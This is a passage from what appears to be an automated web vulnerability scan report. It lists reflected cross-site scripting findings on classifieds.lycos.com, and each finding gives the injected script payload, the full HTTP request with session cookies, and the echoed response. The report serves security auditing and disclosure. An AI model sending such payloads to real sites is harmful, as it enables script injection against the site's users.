User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job-work_from_home/?57054"><script>alert(1)</script>094863826eb=1&mobile=1" rel="nofollow">
...[SNIP]...

1.87. http://classifieds.lycos.com/job/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f385"><script>alert(1)</script>76fb73576c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job2f385"><script>alert(1)</script>76fb73576c2/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:18 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job2f385"><script>alert(1)</script>76fb73576c2/?mobile=1" rel="nofollow">
...[SNIP]...

1.88. http://classifieds.lycos.com/job/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /job/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d8b7"><script>alert(1)</script>809a2f23ff8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job/?7d8b7"><script>alert(1)</script>809a2f23ff8=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/job/?7d8b7"><script>alert(1)</script>809a2f23ff8=1&mobile=1" rel="nofollow">
...[SNIP]...

1.89. http://classifieds.lycos.com/personals/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /personals/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9028c"><script>alert(1)</script>6a01bc38598 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /personals9028c"><script>alert(1)</script>6a01bc38598/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/personals9028c"><script>alert(1)</script>6a01bc38598/?mobile=1" rel="nofollow">
...[SNIP]...

1.90. http://classifieds.lycos.com/personals/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /personals/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f66b0"><script>alert(1)</script>aa27322bcf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /personals/?f66b0"><script>alert(1)</script>aa27322bcf1=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 81210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/personals/?f66b0"><script>alert(1)</script>aa27322bcf1=1&mobile=1" rel="nofollow">
...[SNIP]...

1.91. http://classifieds.lycos.com/post/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /post/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 731a1"><script>alert(1)</script>759aa8706ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post731a1"><script>alert(1)</script>759aa8706ec/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:58:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:58:05 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/post731a1"><script>alert(1)</script>759aa8706ec/?mobile=1" rel="nofollow">
...[SNIP]...

1.92. http://classifieds.lycos.com/post/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /post/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ff76"><script>alert(1)</script>65823c63197 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post/?3ff76"><script>alert(1)</script>65823c63197=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:57:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:57:55 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/post/?3ff76"><script>alert(1)</script>65823c63197=1&mobile=1" rel="nofollow">
...[SNIP]...

1.93. http://classifieds.lycos.com/sale-clothes/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-clothes/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2ac9"><script>alert(1)</script>c8f3dc213dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-clothesf2ac9"><script>alert(1)</script>c8f3dc213dd/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:08:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-clothesf2ac9"><script>alert(1)</script>c8f3dc213dd/?mobile=1" rel="nofollow">
...[SNIP]...

1.94. http://classifieds.lycos.com/sale-clothes/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-clothes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d400c"><script>alert(1)</script>84050bf8d91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-clothes/?d400c"><script>alert(1)</script>84050bf8d91=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:07:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:26 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-clothes/?d400c"><script>alert(1)</script>84050bf8d91=1&mobile=1" rel="nofollow">
...[SNIP]...

1.95. http://classifieds.lycos.com/sale-collectible/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-collectible/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e51"><script>alert(1)</script>ece04b856b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-collectiblec9e51"><script>alert(1)</script>ece04b856b8/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:07:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:23 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-collectiblec9e51"><script>alert(1)</script>ece04b856b8/?mobile=1" rel="nofollow">
...[SNIP]...

1.96. http://classifieds.lycos.com/sale-collectible/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-collectible/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 959b6"><script>alert(1)</script>55cec2650f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-collectible/?959b6"><script>alert(1)</script>55cec2650f8=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:06:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:06:42 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-collectible/?959b6"><script>alert(1)</script>55cec2650f8=1&mobile=1" rel="nofollow">
...[SNIP]...

1.97. http://classifieds.lycos.com/sale-electronics/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-electronics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b301e"><script>alert(1)</script>2d184bf1887 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-electronicsb301e"><script>alert(1)</script>2d184bf1887/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:07:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:36 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-electronicsb301e"><script>alert(1)</script>2d184bf1887/?mobile=1" rel="nofollow">
...[SNIP]...

1.98. http://classifieds.lycos.com/sale-electronics/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-electronics/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eb76"><script>alert(1)</script>3f65cb4ffd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-electronics/?6eb76"><script>alert(1)</script>3f65cb4ffd7=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:06:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:06:54 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-electronics/?6eb76"><script>alert(1)</script>3f65cb4ffd7=1&mobile=1" rel="nofollow">
...[SNIP]...

1.99. http://classifieds.lycos.com/sale-entertainment/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-entertainment/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3731a"><script>alert(1)</script>3d3a5d53bc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-entertainment3731a"><script>alert(1)</script>3d3a5d53bc0/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:28 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-entertainment3731a"><script>alert(1)</script>3d3a5d53bc0/?mobile=1" rel="nofollow">
...[SNIP]...

1.100. http://classifieds.lycos.com/sale-entertainment/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-entertainment/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0491"><script>alert(1)</script>19881e9aaba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-entertainment/?d0491"><script>alert(1)</script>19881e9aaba=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:20 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-entertainment/?d0491"><script>alert(1)</script>19881e9aaba=1&mobile=1" rel="nofollow">
...[SNIP]...

1.101. http://classifieds.lycos.com/sale-free/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-free/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3718"><script>alert(1)</script>7a2e16f3111 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-freeb3718"><script>alert(1)</script>7a2e16f3111/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:07:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17682

